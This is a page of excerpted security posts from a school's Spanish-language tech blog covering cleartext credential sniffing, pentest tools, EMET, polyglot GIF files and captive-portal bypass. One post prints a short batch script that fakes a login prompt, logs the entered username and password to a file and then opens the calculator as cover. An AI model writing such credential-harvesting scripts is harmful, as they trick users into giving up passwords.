Blog gratis
Reportar
Editar
¡Crea tu blog!
Compartir
¡Sorpréndeme!
¿Buscas páginas de herramientas?
Blog de la Escuela de Educación Secundaria Técnica N 8 de Quilmes
Administrador Prof. Claudio Enrique Alonso Alvite
img
« Blog
Entradas por tag: herramientas
Mostrando 51 a 60, de 112 entrada/s en total:
04 de Diciembre, 2014    General

Capturando credenciales en claro mediante un firewall Fortigate

En este mundillo estamos cansados de repetir que se sustituya FTP y telnet por sus respectivos equivalente seguros: SCP, FTPS, SFTP, SSH... pero después de tantos años se siguen utilizando :(

Hoy vamos a hacer una pequeña demostración de la inseguridad del uso de estos protocolos no cifrados capturando tráfico mediante un firewall y obteniendo las contraseñas en claro. 

En la vida real el firewall podría ser la máquina de un atacante, el cuál tendría la misma facilidad para robar credenciales simplemente esnifando el tráfico en un nodo que está en medio del camino de nuestra conexión cliente-servidor. Y no sólo el atacante podría ser una persona hábil que ha envenenado ARP y ha conseguido hacer un MiTM... en este gran entramado que es Internet, un ISP o hasta el administrador de red de una empresa podría estar vigilando..... Continuar leyendo
Palabras claves , , ,
publicado por alonsoclaudio a las 19:27 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Super-cutre script para hacerse un keylogger en batch

Algo cutre pero muy apañao... y seguro que más de uno se dará un gustazo con el batch... Xd
 

Se trata de un script para hacerse un keylogger *muy* básico. Simplemente crea el directorio c:Logs y luego lanza el fichero Logger.bat con el siguiente código:
@echo off
color a
title Login
cls
echo Introduce usuario y password para poder ejecutar el programa:
echo.
echo.
cd "C:Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start calc.exe
exit
Enjoy!

Fuente: http://www.latesthackingnews.com/2014/04/09/how-to-create-a-keylogger-in-notepad/


Palabras claves , ,
publicado por alonsoclaudio a las 22:34 · Sin comentarios  ·  Recomendar
 
02 de Diciembre, 2014    General

Kvasir: Gestión de información en tests de intrusión

Cualquiera que realice tareas de test de intrusión/pentesting (pero el de verdad, no el de lanzar un Nessus y exportar a HTML), sabrá que uno de los retos más importantes, lejos de conseguir el tan ansiado administrador de dominio o la enumeración de posibles puntos de entrada y ataques con los que comprometer la infraestructura interna por completo (y evitar que te hagan un SONY), es el de gestionar correctamente la información que se obtiene.

Cantidades ingentes de datos, puertos abiertos, servicios vulnerables, credenciales obtenidas, documentación sensible que sirva de evidencia, accesos a servidores críticos...podemos dejar una estructura impecable de directorios, excels y bitácoras o podemos recurrir a herramientas que nos permitan congregar dicha información. Ya os hemos hablado anteriormente por aquí de ... Continuar leyendo
Palabras claves , , , ,
publicado por alonsoclaudio a las 23:17 · Sin comentarios  ·  Recomendar
 
02 de Diciembre, 2014    General

LiveCD basado en Ubuntu centrado en la eliminación de malware de Windows

La mayoría del malware moderno puede desactivar los mecanismos de seguridad de los sistemas Windows con el fin de ocultarse y protegerse de ser eliminado por los antivirus que corren en el sistema, esta característica, hace que el proceso de identificación y eliminación sea una operación muy complicada y en la mayoría casos, imposible de llevar a cabo con el sistema operativo arrancado. Lo mejor es arrancar con una LiveCD, montar el disco del sistema Windows y usar herramientas de eliminación de malware, todo esto sin el sistema Windows arrancado.
Para estés casos Ubuntu MRT (Ubuntu Malware Removal Toolkit) una LiveCD basada en Ubuntu centrado en la eliminación de software malintencionado de Windows, es lo ideal. El propósito de esta distribución es la creación de un entorno portátil, que hace más fácil quitar el malware de los sistemas Windows infectados. Permite analizar rápidamente el disco de un equipo infectado sin tener que arrancar el sistema... Continuar leyendo
Palabras claves , , , ,
publicado por alonsoclaudio a las 23:03 · Sin comentarios  ·  Recomendar
 
21 de Noviembre, 2014    General

Probando aplicaciones de auditoría web con Google Web "Firing Range"

Google anunció el pasado martes en su blog Google Online Security la publicación de una aplicación online (con su código fuente correspondiente) en la que se recopilaban diferentes pruebas de concepto relacionadas con vulnerabilidades típicas web, con especial hincapié en todas las variantes posibles para la ejecución de Cross-Site Scriptings. Actualmente Google se encuentra desarrollando una herramienta de auditoría de vulnerabilidades para uso interno (a la que llaman Inquisition) para la cual necesitaban casos reales de vulnerabilidades para probar su eficacia.


Palabras claves , , , , , ,
publicado por alonsoclaudio a las 18:42 · Sin comentarios  ·  Recomendar
 
13 de Noviembre, 2014    General

Firefox Developer Edition, primer vistazo


Fde 01

Dentro de los fastos por su décimo aniversario, la gente del ¿zorro? ¿panda rojo?... bueno, la gente de Mozilla ha sacado a la luz el muy anticipado Firefox Developer Edition, una versión de su tradicional navegador enfocado en los desarrolladores. Lo hemos estado probando y la verdad es que las sensaciones son encontradas en esta primera de contacto.

Es siempre agradable que se acuerden de nosotros pero lo cierto es que Firefox Developer Edition no es un "game changer" (salvo, quizás, que seas un desarrollador de apps para Firefox OS), aunque seguramente tampoco es que esta fuera la idea inicial de Mozilla.

Lo primero que llama ... Continuar leyendo

Palabras claves , , , ,
publicado por alonsoclaudio a las 21:27 · Sin comentarios  ·  Recomendar
 
11 de Noviembre, 2014    General

Microsoft publica la versión 5.1 de EMET

Microsoft ha lanzado la versión 5.1 de EMET (Enhanced Mitigation Experience Toolkit). Ya sabéis que EMET permite usar técnicas no implementadas por los desarrolladores de software elevando la seguridad hasta el máximo permitido Windows. Estas técnicas EMET, o mitigaciones, bloquean muchos de los métodos utilizados por el software malicioso y exploits de vulnerabilidades.

Esta nueva versión corrige varios errores y problemas de compatibilidad con diversas aplicaciones. Las aplicaciones incluyen Internet Explorer, Adobe Reader, Adobe Flash y Mozilla Firefox (estos problemas son de esperar con una herramienta tan "agresiva" como EMET que inicialmente no es parte de Windows). La nueva versión incluye también configuraciones especiales para Oracle Java 8 y Google Chrome y añade una función de "Telemetría Local", que permite al usuario guardar volcados de memoria cuando se desencadena una mitigación. Tenéis todos los detalles en ... Continuar leyendo
Palabras claves , , ,
publicado por alonsoclaudio a las 23:49 · Sin comentarios  ·  Recomendar
 
09 de Noviembre, 2014    General

Archivos binarios políglotas (o como atacar con un GIF)

Ange Albertini (padre de Angecryption que más adelante veremos) es sin duda un auténtico mago a la hora de crear binarios "políglotas", que son ficheros que tienen simultáneamente varios formatos. Por ejemplo PDF/ZIP/JPG/Audio, PE/PDF/HTML/ZIP, TrueCrypt/PDF/ZIP, etc. Es decir, cada uno de estos ficheros pueden ser abiertos por varias aplicaciones sin error.

Una de las cosas que más nos interesan, dado el mundo de maldad y desenfreno en el que vivimos los hackers"piratas informáticos", es la técnica para abusar de la cabecera de los ficheros GIFs y añadir código Javascript. El resultado un fichero GIF que sea un fichero GIF y JS al mismo tiempo.

Imaginad... basta con publicar anónimamente una copia de una de las últimas imágenes robadas de alguna famosa y recibiremos miles y miles de visitas de incautas (pero satisfechas) víctimas, cuyos... Continuar leyendo
Palabras claves , , ,
publicado por alonsoclaudio a las 12:53 · Sin comentarios  ·  Recomendar
 
04 de Noviembre, 2014    General

Moloch, el wireshark via web de AOL para forenses de red

No es la primera vez que una de las compañías grandes publica una herramienta que, al parecer lleva utilizando durante mucho tiempo, y que posteriormente deja a disposición de todo el mundo.

Hoy os hablamos de Moloch, herramienta via web para análisis de tráfico de red (open source), que nos llega por parte del gigante de las telecomunicaciones, AOL.


A grandes rasgos, ¿qué nos aporta frente al conocido por todos Wireshark?

  • Se utiliza y gestiona vía web
  • Está muy enfocado al análisis forense, por lo que hay disponibles plugins muy concretos para dichos menesteres (como por ejemplo, Geolocalización de tramas, reglas de Yara...)
  • Facilidad para la búsqueda e indexado de información dentro de las capturas de red
  • Posibilidad de crear GUIs propias debido a que hay disponible una API para todo... Continuar leyendo
Palabras claves , , , ,
publicado por alonsoclaudio a las 21:22 · Sin comentarios  ·  Recomendar
 
01 de Noviembre, 2014    General

Saltando los hotspots con un solo click

Hoy en día es muy habitual encontrarse pay-walls o portales cautivos en hotspots públicos, especialmente en sitios como hoteles y aeropuertos.

En esta entrada se mostrará como los WISP implementan estos pay-walls, y cuales suelen ser generalmente sus debilidades.

Si viajamos con un smartphone o tablet Android es muy fácil saltarse el portal cautivo desde el mismo dispositivo Android, sin necesidad de hacer túneles a través de DNS o ICMP. Presentaremos una herramienta que nos permite automatizar el proceso para saltarnos el pay-wall en "1 click".

En la pasada Rooted ... Continuar leyendo
Palabras claves , , , , , ,
publicado por alonsoclaudio a las 15:51 · Sin comentarios  ·  Recomendar
 
CALENDARIO
Ver mes anterior Mayo 2025 Ver mes siguiente
DOLUMAMIJUVISA
123
45678910
11121314151617
18192021222324
25262728293031
BUSCADOR
Blog   Web
TÓPICOS
» General (2606)
NUBE DE TAGS  [?]
SECCIONES
» Inicio
ENLACES
MÁS LEÍDOS
» Analizando el LiveBox 2.1 de Orange
» Cómo espiar WhatsApp
» Detectando tráfico de conexiones HTTP inversas de Meterpreter (Snort)
» Ejecución remota de código arbitrario en OpenSSH
» Ganar dinero con 1.200 Millones de identidades robadas
» Hardware y sus 4 Funcionamientos Basicos y Principales en una Computadora
» Redes de la Deep Web: CJDNS y la Red Hyperboria
» Un Script de Facebook para ganar dinero (fraude)
» Unidad Central de Procesamiento CPU
» Wassap, la aplicación que permite usar WhatsApp desde la PC
SE COMENTA...
» Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años
3 Comentarios: tecnicaquilmes.fullblog.com.ar/, tecnicaquilmes.fullblog.com.ar/ ...
» Países latinos que usaban Hacking Team
2 Comentarios: 토토먹튀, 툰코주소
» XSSPOSED: El archivo de los bugs XSS en Internet
3 Comentarios: Srichakra, srichakra, srichakra
» Cómo espiar WhatsApp
595 Comentarios: Scott, Scott, Jarlinson mercy, [...] ...
» Qué hacer ante el robo de un teléfono móvil o una tableta
2 Comentarios: best buy security cameras swann, best buy security cameras swann
SOBRE MÍ
FOTO

Prof. Claudio Enrique Alonso Alvite



» Ver perfil

AL MARGEN
Escuela de Educacion Secundaria Tecnica N 8 de Quilmes
(Técnicos en Informática Personal y Profesional)
FULLServices Network | Blogger | Privacidad